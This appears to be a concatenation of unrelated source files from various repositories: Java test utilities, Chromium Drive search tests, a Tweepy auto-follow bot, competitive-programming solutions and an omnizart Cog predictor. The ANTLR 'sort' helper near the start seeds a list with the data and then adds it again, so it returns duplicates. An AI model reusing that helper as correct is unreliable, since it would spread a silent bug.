ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLIT, EventType.RS_ZK_REGION_SPLIT, znodeVersion, payload); } }
14,772
11,811
<reponame>maximmenshikov/antlr4<filename>runtime-testsuite/test/org/antlr/v4/test/runtime/RuntimeTestUtils.java package org.antlr.v4.test.runtime; import org.antlr.v4.runtime.*; import org.antlr.v4.runtime.atn.ATN; import org.antlr.v4.runtime.atn.LexerATNSimulator; import org.antlr.v4.runtime.dfa.DFA; import org.antlr.v4.runtime.misc.IntegerList; import org.antlr.v4.tool.LexerGrammar; import java.io.*; import java.util.*; public abstract class RuntimeTestUtils { /** Sort a list */ public static <T extends Comparable<? super T>> List<T> sort(List<T> data) { List<T> dup = new ArrayList<T>(data); dup.addAll(data); Collections.sort(dup); return dup; } /** Return map sorted by key */ public static <K extends Comparable<? super K>,V> LinkedHashMap<K,V> sort(Map<K,V> data) { LinkedHashMap<K,V> dup = new LinkedHashMap<K, V>(); List<K> keys = new ArrayList<K>(data.keySet()); Collections.sort(keys); for (K k : keys) { dup.put(k, data.get(k)); } return dup; } public static List<String> getTokenTypes(LexerGrammar lg, ATN atn, CharStream input) { LexerATNSimulator interp = new LexerATNSimulator(atn, new DFA[]{new DFA(atn.modeToStartState.get(Lexer.DEFAULT_MODE))}, null); List<String> tokenTypes = new ArrayList<String>(); int ttype; boolean hitEOF = false; do { if ( hitEOF ) { tokenTypes.add("EOF"); break; } int t = input.LA(1); ttype = interp.match(input, Lexer.DEFAULT_MODE); if ( ttype==Token.EOF ) { tokenTypes.add("EOF"); } else { tokenTypes.add(lg.typeToTokenList.get(ttype)); } if ( t== IntStream.EOF ) { hitEOF = true; } } while ( ttype!=Token.EOF ); return tokenTypes; } public static IntegerList getTokenTypesViaATN(String input, LexerATNSimulator lexerATN) { ANTLRInputStream in = new ANTLRInputStream(input); IntegerList tokenTypes = new IntegerList(); int ttype; do { ttype = lexerATN.match(in, Lexer.DEFAULT_MODE); tokenTypes.add(ttype); } while ( ttype!= Token.EOF ); return tokenTypes; } public static void copyFile(File source, File dest) throws IOException { InputStream is = new FileInputStream(source); OutputStream os = new FileOutputStream(dest); byte[] buf = new byte[4 << 10]; int l; while ((l = is.read(buf)) > -1) { os.write(buf, 0, l); } is.close(); os.close(); } public static void mkdir(String dir) { File f = new File(dir); f.mkdirs(); } }
1,052
6,969
<filename>3]. Competitive Programming/08]. LeetCode/1]. Problems/Python/0029)_ii_Divide_Two_Integers.py
class Solution:
    def divide(self, dividend, divisor):
        ans = 0
        pos = [abs(divisor)]
        cnts = [1]
        n = 0
        while pos and n <= abs(dividend):
            if n + pos[-1] + pos[-1] <= abs(dividend):
                pos.append(pos[-1] + pos[-1])
                cnts.append(cnts[-1] + cnts[-1])
                ans += cnts[-1]
                n += pos[-1]
            elif n + pos[-1] <= abs(dividend):
                ans += cnts[-1]
                n += pos[-1]
            else:
                while pos:
                    if n + pos[-1] <= abs(dividend):
                        ans += cnts[-1]
                        n += pos[-1]
                    else:
                        pos.pop()
                        cnts.pop()
        if dividend > 0 and divisor < 0 or dividend < 0 and divisor > 0:
            ans = -ans
        if ans < -(2**31) or ans > 2**31 - 1:
            return 2**31 - 1
        return ans
664
5,364
<gh_stars>1000+
{
    "name": "defuse/php-encryption",
    "remark": "Symmetric-key encryption library for PHP applications. (**Recommended** over rolling your own!)",
    "url": "https://github.com/defuse/php-encryption"
}
80
1,540
<gh_stars>1000+
package org.testng.internal.invokers;

import java.util.Collection;
import java.util.Map;
import org.testng.ISuite;
import org.testng.TestNGException;
import org.testng.collections.Maps;
import org.testng.xml.XmlSuite;

public class SuiteRunnerMap {

  private final Map<String, ISuite> m_map = Maps.newHashMap();

  public void put(XmlSuite xmlSuite, ISuite suite) {
    final String name = xmlSuite.getName();
    if (m_map.containsKey(name)) {
      throw new TestNGException("SuiteRunnerMap already have runner for suite " + name);
    }
    m_map.put(name, suite);
  }

  public ISuite get(XmlSuite xmlSuite) {
    return m_map.get(xmlSuite.getName());
  }

  public Collection<ISuite> values() {
    return m_map.values();
  }
}
280
3,182
package de.plushnikov.intellij.plugin.extension.postfix;

import com.intellij.psi.PsiClassType;
import com.intellij.psi.PsiType;
import com.intellij.refactoring.introduceVariable.IntroduceVariableSettings;

public class IntroduceVariableSettingsDelegate implements IntroduceVariableSettings {
  private final IntroduceVariableSettings variableSettings;
  private final PsiClassType psiClassType;

  public IntroduceVariableSettingsDelegate(IntroduceVariableSettings variableSettings, PsiClassType psiClassType) {
    this.variableSettings = variableSettings;
    this.psiClassType = psiClassType;
  }

  @Override
  public String getEnteredName() {
    return variableSettings.getEnteredName();
  }

  @Override
  public boolean isReplaceAllOccurrences() {
    return variableSettings.isReplaceAllOccurrences();
  }

  @Override
  public boolean isDeclareFinal() {
    return variableSettings.isDeclareFinal();
  }

  @Override
  public boolean isReplaceLValues() {
    return variableSettings.isReplaceLValues();
  }

  @Override
  public PsiType getSelectedType() {
    return psiClassType;
  }

  @Override
  public boolean isOK() {
    return variableSettings.isOK();
  }
}
352
1,979
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to you under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.qihoo.qsql.org.apache.calcite.linq4j; import java.util.Collection; import java.util.Map; import java.util.Objects; /** * Implementation of {@link Grouping}. * * @param <K> Key type * @param <V> Value type */ class GroupingImpl<K, V> extends AbstractEnumerable<V> implements Grouping<K, V>, Map.Entry<K, Enumerable<V>> { private final K key; private final Collection<V> values; GroupingImpl(K key, Collection<V> values) { this.key = Objects.requireNonNull(key); this.values = Objects.requireNonNull(values); } @Override public String toString() { return key + ": " + values; } /** {@inheritDoc} * * <p>Computes hash code consistent with * {@link java.util.Map.Entry#hashCode()}. */ @Override public int hashCode() { return key.hashCode() ^ values.hashCode(); } @Override public boolean equals(Object obj) { return obj instanceof GroupingImpl && key.equals(((GroupingImpl) obj).key) && values.equals(((GroupingImpl) obj).values); } // implement Map.Entry public Enumerable<V> getValue() { return Linq4j.asEnumerable(values); } // implement Map.Entry public Enumerable<V> setValue(Enumerable<V> value) { // immutable throw new UnsupportedOperationException(); } // implement Map.Entry // implement Grouping public K getKey() { return key; } public Enumerator<V> enumerator() { return Linq4j.enumerator(values); } } // End GroupingImpl.java
720
693
from manim_imports_ext import *

class TestScene(AlgoScene):
    def construct(self):
        avatar = AlgoAvatar(self)
        avatar.center().scale(0.5)
        self.add(avatar)
        self.wait(2)

class TestTexScene(AlgoScene):
    def construct(self):
        self.show_diff()
        self.wait(2)

    def show_diff(self):
        kw = {
            "tex_to_color_map": {
                "x_0": BLUE_D,
                "y_0": BLUE_B,
                "{t}": GREY_B,
                "O(2)": BLUE_D,
                "前缀和": BLUE_D,
                "单点": BLUE_D,
            }
        }
        s = VGroup(
            TexText("1 前缀和:数组不变,区间求和$O(1)$", color=BLACK, **kw),
            Tex("\\text {1 前缀和:数组不变,区间求和} O(2)", color=BLACK, **kw),
            TexText("2 树状数组:用于区间求和,单点修改 $O(logn)$", color=BLACK, **kw),
            TexText("3 线段树:用于区间求和,区间最大值,区间修改,单点修改 $O(logn)$", color=BLACK, **kw),
            Tex("x({t}) = \\cos(t) x_0 - \\sin(t) y_0", color=BLACK, **kw),
        )
        s.arrange(direction=DOWN, aligned_edge=LEFT, buff=0.1)
        s.scale(0.5).center()
        self.add(s)
796
765
/***************************************************************************** * McPAT * SOFTWARE LICENSE AGREEMENT * Copyright (c) 2010-2013 Advanced Micro Devices, Inc. * All Rights Reserved * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer; * redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution; * neither the name of the copyright holders nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * Author: <NAME> * ***************************************************************************/ #include "cachecontroller.h" CacheController::CacheController(XMLNode* _xml_data, InputParameter* _interface_ip) : McPATComponent(_xml_data, _interface_ip) { name = "Cache Controller"; clockRate = target_core_clockrate; McPATComponent::recursiveInstantiate(); }
662
496
#!/usr/bin/env python3
import tweepy
import logging
from config import create_api
import time

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()

'''
A lot of Twitter API endpoints use pagination to return their results.
Tweepy cursors take away part of the complexity of working with paginated
results. The Cursor object is iterable and takes care of fetching the
various result pages transparently.
'''

def follow_followers(api):
    logger.info("Retrieving and following followers")
    for follower in tweepy.Cursor(api.followers).items():
        if not follower.following:
            logger.info(f"Following {follower.name}")
            follower.follow()

"""
The bot fetches the list of followers every minute (adjustable via the
time.sleep parameter) and iterates through it to follow any user who is
not already followed.
"""

def main():
    api = create_api()
    while True:
        follow_followers(api)
        logger.info("Waiting...")
        time.sleep(60)

if __name__ == "__main__":
    main()
342
2,151
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_
#define IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_

@protocol PasswordFormFiller;

// ActivityServicePassword contains methods related to password autofill.
@protocol ActivityServicePassword

// Returns the PasswordFormFiller for the current active WebState.
- (id<PasswordFormFiller>)currentPasswordFormFiller;

@end

#endif  // IOS_CHROME_BROWSER_UI_ACTIVITY_SERVICES_REQUIREMENTS_ACTIVITY_SERVICE_PASSWORD_H_
235
1,234
package org.benf.cfr.reader.state;

import org.benf.cfr.reader.bytecode.analysis.types.JavaTypeInstance;
import org.benf.cfr.reader.entities.innerclass.InnerClassAttributeInfo;
import org.benf.cfr.reader.util.functors.UnaryFunction;

import java.util.List;

public interface ObfuscationTypeMap {
    boolean providesInnerClassInfo();

    JavaTypeInstance get(JavaTypeInstance type);

    UnaryFunction<JavaTypeInstance, JavaTypeInstance> getter();

    List<InnerClassAttributeInfo> getInnerClassInfo(JavaTypeInstance classType);
}
172
1,968
////////////////////////////////////////////////////////////////////////////// // // This file is part of the Corona game engine. // For overview and more information on licensing please refer to README.md // Home page: https://github.com/coronalabs/corona // Contact: <EMAIL> // ////////////////////////////////////////////////////////////////////////////// package com.ansca.corona; import com.naef.jnlua.LuaState; import com.naef.jnlua.LuaType; // ---------------------------------------------------------------------------- /** * <font face="Courier New" color="black">CoronaLuaEvent.java</font> contains generic property keys used in Corona * <a href="http://docs.coronalabs.com/daily/api/type/Event.html">events</a> dispatched to Lua. */ public class CoronaLuaEvent { /** * Generic name key. * <p> * &emsp; Constant Value: "name" */ public static final String NAME_KEY = "name"; /** * Generic error key. * <p> * &emsp; Constant Value: "isError" */ public static final String ISERROR_KEY = "isError"; /** * Generic provider key. * <p> * &emsp; Constant Value: "provider" */ public static final String PROVIDER_KEY = "provider"; /** * Generic verification key. * <p> * &emsp; Constant Value: "isVerified" */ public static final String ISVERIFIED_KEY = "isVerified"; /** * Generic response key. * <p> * &emsp; Constant Value: "response" */ public static final String RESPONSE_KEY = "response"; /** * Generic error type key. * <p> * &emsp; Constant Value: "errorType" */ public static final String ERRORTYPE_KEY = "errorType"; /** * Generic configuration key. * <p> * &emsp; Constant Value: "configuration" */ public static final String CONFIGURATION_ERROR = "configuration"; /** * Generic network key. * <p> * &emsp; Constant Value: "network" */ public static final String NETWORK_ERROR = "network"; /** * Generic ads request name key. * <p> * &emsp; Constant Value: "adsRequest" */ public static final String ADSREQUEST_TYPE = "adsRequest"; /** * Generic license type key. * <p> * &emsp; Constant Value: "licensing" */ public static final String LICENSE_REQUEST_TYPE = "licensing"; } // ----------------------------------------------------------------------------
688
2,151
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/drive/chromeos/file_system/search_operation.h" #include <stddef.h> #include "base/callback_helpers.h" #include "components/drive/chromeos/loader_controller.h" #include "components/drive/file_system/operation_test_base.h" #include "components/drive/service/fake_drive_service.h" #include "content/public/test/test_utils.h" #include "google_apis/drive/drive_api_parser.h" #include "google_apis/drive/test_util.h" #include "testing/gtest/include/gtest/gtest.h" namespace drive { namespace file_system { typedef OperationTestBase SearchOperationTest; TEST_F(SearchOperationTest, ContentSearch) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); std::set<std::string> expected_results; expected_results.insert( "drive/root/Directory 1/Sub Directory Folder/Sub Sub Directory Folder"); expected_results.insert("drive/root/Directory 1/Sub Directory Folder"); expected_results.insert("drive/root/Directory 1/SubDirectory File 1.txt"); expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/root/Directory 2 excludeDir-test"); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("Directory", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); EXPECT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } } TEST_F(SearchOperationTest, ContentSearchWithNewEntry) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); // Create a new directory in the drive service. google_apis::DriveApiErrorCode status = google_apis::DRIVE_OTHER_ERROR; std::unique_ptr<google_apis::FileResource> server_entry; fake_service()->AddNewDirectory( fake_service()->GetRootResourceId(), "New Directory 1!", AddNewDirectoryOptions(), google_apis::test_util::CreateCopyResultCallback(&status, &server_entry)); content::RunAllTasksUntilIdle(); ASSERT_EQ(google_apis::HTTP_CREATED, status); // As the result of the first Search(), only entries in the current file // system snapshot are expected to be returned in the "right" path. New // entries like "New Directory 1!" is temporarily added to "drive/other". std::set<std::string> expected_results; expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/other/New Directory 1!"); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); ASSERT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } // Load the change from FakeDriveService. ASSERT_EQ(FILE_ERROR_OK, CheckForUpdates()); // Now the new entry must be reported to be in the right directory. 
expected_results.clear(); expected_results.insert("drive/root/Directory 1"); expected_results.insert("drive/root/New Directory 1!"); error = FILE_ERROR_FAILED; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); ASSERT_EQ(expected_results.size(), results->size()); for (size_t i = 0; i < results->size(); i++) { EXPECT_TRUE(expected_results.count(results->at(i).path.AsUTF8Unsafe())) << results->at(i).path.AsUTF8Unsafe(); } } TEST_F(SearchOperationTest, ContentSearchEmptyResult) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"no-match query\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); EXPECT_TRUE(next_link.is_empty()); EXPECT_EQ(0U, results->size()); } TEST_F(SearchOperationTest, Lock) { SearchOperation operation(blocking_task_runner(), scheduler(), metadata(), loader_controller()); // Lock. std::unique_ptr<base::ScopedClosureRunner> lock = loader_controller()->GetLock(); // Search does not return the result as long as lock is alive. FileError error = FILE_ERROR_FAILED; GURL next_link; std::unique_ptr<std::vector<SearchResultInfo>> results; operation.Search("\"Directory 1\"", GURL(), google_apis::test_util::CreateCopyResultCallback( &error, &next_link, &results)); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_FAILED, error); EXPECT_FALSE(results); // Unlock, this should resume the pending search. lock.reset(); content::RunAllTasksUntilIdle(); EXPECT_EQ(FILE_ERROR_OK, error); ASSERT_TRUE(results); EXPECT_EQ(1u, results->size()); } } // namespace file_system } // namespace drive
/* * Copyright 2016-2020 chronicle.software * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package net.openhft.affinity; import net.openhft.affinity.impl.Utilities; import net.openhft.affinity.impl.VanillaCpuLayout; import net.openhft.affinity.testimpl.TestFileLockBasedLockChecker; import org.junit.Test; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import static net.openhft.affinity.AffinityLock.PROCESSORS; import static org.hamcrest.CoreMatchers.is; import static org.junit.Assert.*; import static org.junit.Assume.assumeTrue; /** * @author peter.lawrey */ public class AffinityLockTest extends BaseAffinityTest { private static final Logger logger = LoggerFactory.getLogger(AffinityLockTest.class); private final TestFileLockBasedLockChecker lockChecker = new TestFileLockBasedLockChecker(); @Test public void dumpLocksI7() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("i7.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, false, lockInventory), new AffinityLock(2, false, true, lockInventory), new AffinityLock(3, false, true, lockInventory), new AffinityLock(4, true, false, lockInventory), new AffinityLock(5, false, false, lockInventory), new AffinityLock(6, false, true, lockInventory), new AffinityLock(7, false, true, lockInventory), }; locks[2].assignedThread = new Thread(new InterrupedThread(), "logger"); locks[2].assignedThread.start(); locks[3].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[3].assignedThread.start(); locks[6].assignedThread = new Thread(new InterrupedThread(), "main"); locks[7].assignedThread = new Thread(new InterrupedThread(), "tcp"); locks[7].assignedThread.start(); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: General use CPU\n" + "1: CPU not available\n" + "2: Thread[logger,5,main] alive=true\n" + "3: Thread[engine,5,main] alive=true\n" + "4: General use CPU\n" + "5: CPU not available\n" + "6: Thread[main,5,main] alive=false\n" + "7: Thread[tcp,5,main] alive=true\n", actual); System.out.println(actual); locks[2].assignedThread.interrupt(); locks[3].assignedThread.interrupt(); locks[6].assignedThread.interrupt(); locks[7].assignedThread.interrupt(); } @Test public void dumpLocksI3() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("i3.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, true, lockInventory), new AffinityLock(2, true, false, lockInventory), new AffinityLock(3, false, true, lockInventory), }; locks[1].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[1].assignedThread.start(); locks[3].assignedThread = new Thread(new InterrupedThread(), "main"); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: 
General use CPU\n" + "1: Thread[engine,5,main] alive=true\n" + "2: General use CPU\n" + "3: Thread[main,5,main] alive=false\n", actual); System.out.println(actual); locks[1].assignedThread.interrupt(); } @Test public void dumpLocksCoreDuo() throws IOException { LockInventory lockInventory = new LockInventory(VanillaCpuLayout.fromCpuInfo("core.duo.cpuinfo")); AffinityLock[] locks = { new AffinityLock(0, true, false, lockInventory), new AffinityLock(1, false, true, lockInventory), }; locks[1].assignedThread = new Thread(new InterrupedThread(), "engine"); locks[1].assignedThread.start(); final String actual = LockInventory.dumpLocks(locks); assertEquals("0: General use CPU\n" + "1: Thread[engine,5,main] alive=true\n", actual); System.out.println(actual); locks[1].assignedThread.interrupt(); } @Test public void assignReleaseThread() throws IOException { if (AffinityLock.RESERVED_AFFINITY.isEmpty()) { System.out.println("Cannot run affinity test as no threads gave been reserved."); System.out.println("Use isolcpus= in grub.conf or use -D" + AffinityLock.AFFINITY_RESERVED + "={hex mask}"); return; } else if (!new File("/proc/cpuinfo").exists()) { System.out.println("Cannot run affinity test as this system doesn't have a /proc/cpuinfo file"); return; } AffinityLock.cpuLayout(VanillaCpuLayout.fromCpuInfo()); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); AffinityLock al = AffinityLock.acquireLock(); assertEquals(1, Affinity.getAffinity().cardinality()); al.release(); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); AffinityLock al2 = AffinityLock.acquireCore(); assertEquals(1, Affinity.getAffinity().cardinality()); al2.release(); assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); } @Test public void resetAffinity() { assumeTrue(System.getProperty("os.name").contains("nux")); assertTrue(Affinity.getAffinity().cardinality() > 1); try (AffinityLock lock = AffinityLock.acquireLock()) { assertEquals(1, Affinity.getAffinity().cardinality()); assertTrue(lock.resetAffinity()); lock.resetAffinity(false); } assertEquals(1, Affinity.getAffinity().cardinality()); try (AffinityLock lock = AffinityLock.acquireLock()) { } assertTrue(Affinity.getAffinity().cardinality() > 1); } @Test public void testIssue21() throws IOException { if (!new File("/proc/cpuinfo").exists()) { System.out.println("Cannot run affinity test as this system doesn't have a /proc/cpuinfo file"); return; } AffinityLock.cpuLayout(VanillaCpuLayout.fromCpuInfo()); AffinityLock al = AffinityLock.acquireLock(); AffinityLock alForAnotherThread = al.acquireLock(AffinityStrategies.ANY); if (Runtime.getRuntime().availableProcessors() > 2) { AffinityLock alForAnotherThread2 = al.acquireLock(AffinityStrategies.ANY); assertNotSame(alForAnotherThread, alForAnotherThread2); if (alForAnotherThread.cpuId() != -1) assertNotSame(alForAnotherThread.cpuId(), alForAnotherThread2.cpuId()); alForAnotherThread2.release(); } else { assertNotSame(alForAnotherThread, al); if (alForAnotherThread.cpuId() != -1) assertNotSame(alForAnotherThread.cpuId(), al.cpuId()); } alForAnotherThread.release(); al.release(); } @Test public void testIssue19() { System.out.println("AffinityLock.PROCESSORS=" + PROCESSORS); AffinityLock al = AffinityLock.acquireLock(); List<AffinityLock> locks = new ArrayList<>(); locks.add(al); for (int i = 0; i < 256; i++) locks.add(al = al.acquireLock(AffinityStrategies.DIFFERENT_SOCKET, AffinityStrategies.DIFFERENT_CORE, 
AffinityStrategies.SAME_SOCKET, AffinityStrategies.ANY)); for (AffinityLock lock : locks) { lock.release(); } } @Test public void testGettid() { System.out.println("cpu= " + Affinity.getCpu()); } @Test public void testAffinity() throws InterruptedException { // System.out.println("Started"); logger.info("Started"); displayStatus(); try (AffinityLock al = AffinityLock.acquireLock()) { System.out.println("Main locked"); displayStatus(); Thread t = new Thread(new Runnable() { @Override public void run() { AffinityLock al2 = al.acquireLock(AffinityStrategies.SAME_SOCKET, AffinityStrategies.ANY); System.out.println("Thread-0 locked"); displayStatus(); al2.release(); } }); t.start(); t.join(); System.out.println("Thread-0 unlocked"); displayStatus(); } System.out.println("All unlocked"); displayStatus(); } @Test public void shouldReturnLockForSpecifiedCpu() { assumeTrue(Runtime.getRuntime().availableProcessors() > 3); try (final AffinityLock affinityLock = AffinityLock.acquireLock(3)) { assertThat(affinityLock.cpuId(), is(3)); } assertEquals(AffinityLock.BASE_AFFINITY, Affinity.getAffinity()); } @Test public void lockFilesShouldBeRemovedOnRelease() { if (!Utilities.ISLINUX) { return; } final AffinityLock lock = AffinityLock.acquireLock(); assertTrue(Files.exists(Paths.get(lockChecker.doToFile(lock.cpuId()).getAbsolutePath()))); lock.release(); assertFalse(Files.exists(Paths.get(lockChecker.doToFile(lock.cpuId()).getAbsolutePath()))); } private void displayStatus() { System.out.println(Thread.currentThread() + " on " + Affinity.getCpu() + "\n" + AffinityLock.dumpLocks()); } @Test public void testAffinityLockDescriptions() { if (!Utilities.ISLINUX) { return; } try (AffinityLock lock = AffinityLock.acquireLock("last")) { assertEquals(PROCESSORS - 1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("last")) { assertEquals(PROCESSORS - 1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("last-1")) { assertEquals(PROCESSORS - 2, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("1")) { assertEquals(1, Affinity.getCpu()); } try (AffinityLock lock = AffinityLock.acquireLock("any")) { assertTrue(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock("none")) { assertFalse(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock((String) null)) { assertFalse(lock.bound); } try (AffinityLock lock = AffinityLock.acquireLock("0")) { assertFalse(lock.bound); } } }
// Ashindustry007/competitive-programming
// https://open.kattis.com/problems/stararrangements
#include <iostream>
using namespace std;
int main() {
  int s;
  cin >> s;
  cout << s << ":\n";
  for (int i = 2; i < s; i++) {
    if (s % (2 * i - 1) == 0 || s % (2 * i - 1) == i) cout << i << "," << i - 1 << endl;
    if (s % i == 0) cout << i << "," << i << endl;
  }
}
""" To push this predictor to replicate.com, first run download_checkpoints() and save files to omnizart/checkpoints. Then run cog push. Further documentation can be found at https://replicate.com/docs """ import os import tempfile import subprocess import shutil from pathlib import Path import cog import scipy.io.wavfile as wave from omnizart.remote import download_large_file_from_google_drive from omnizart.beat import app as bapp from omnizart.chord import app as capp from omnizart.drum import app as dapp from omnizart.music import app as mapp from omnizart.vocal import app as vapp from omnizart.vocal_contour import app as vcapp class Predictor(cog.Predictor): def setup(self): self.SF2_FILE = "general_soundfont.sf2" if not os.path.exists(self.SF2_FILE): print("Downloading soundfont...") download_large_file_from_google_drive( "16RM-dWKcNtjpBoo7DFSONpplPEg5ruvO", file_length=31277462, save_name=self.SF2_FILE ) self.app = {"music": mapp, "chord": capp, "drum": dapp, "vocal": vapp, "vocal-contour": vcapp, "beat": bapp} self.model_path = {"piano": "Piano", "piano-v2": "PianoV2", "assemble": "Stream", "pop-song": "Pop", "": None} @cog.input( "audio", type=Path, help="Path to the input music. Supports mp3 and wav format.", ) @cog.input( "mode", type=str, default="music-piano-v2", options=["music-piano", "music-piano-v2", "music-assemble", "chord", "drum", "vocal", "vocal-contour", "beat"], help="Transcription mode", ) def predict(self, audio, mode): assert str(audio).endswith(".mp3") or str(audio).endswith(".wav"), "Please upload mp3 or wav file." temp_folder = "cog_temp" os.makedirs(temp_folder, exist_ok=True) try: audio_name = str(os.path.splitext(os.path.basename(audio))[0]) if str(audio).endswith(".wav"): wav_file_path = str(audio) else: wav_file_path = f"{temp_folder}/{audio_name}.wav" subprocess.run(["ffmpeg", "-y", "-i", str(audio), wav_file_path]) model = "" if mode.startswith("music"): mode_list = mode.split("-") mode = mode_list[0] model = "-".join(mode_list[1:]) app = self.app[mode] model_path = self.model_path[model] midi = app.transcribe(wav_file_path, model_path=model_path) if mode == "vocal-contour": out_name = f"{audio_name}_trans.wav" else: print("Synthesizing MIDI...") out_name = f"{temp_folder}/{audio_name}_synth.wav" raw_wav = midi.fluidsynth(fs=44100, sf2_path=self.SF2_FILE) wave.write(out_name, 44100, raw_wav) out_path = Path(tempfile.mkdtemp()) / "out.mp3" # out_path is automatically cleaned up by cog subprocess.run(["ffmpeg", "-y", "-i", out_name, str(out_path)]) finally: shutil.rmtree(temp_folder) if os.path.exists(f"{audio_name}.mid"): os.remove(f"{audio_name}.mid") if os.path.exists(f"{audio_name}_trans.wav"): os.remove(f"{audio_name}_trans.wav") return out_path
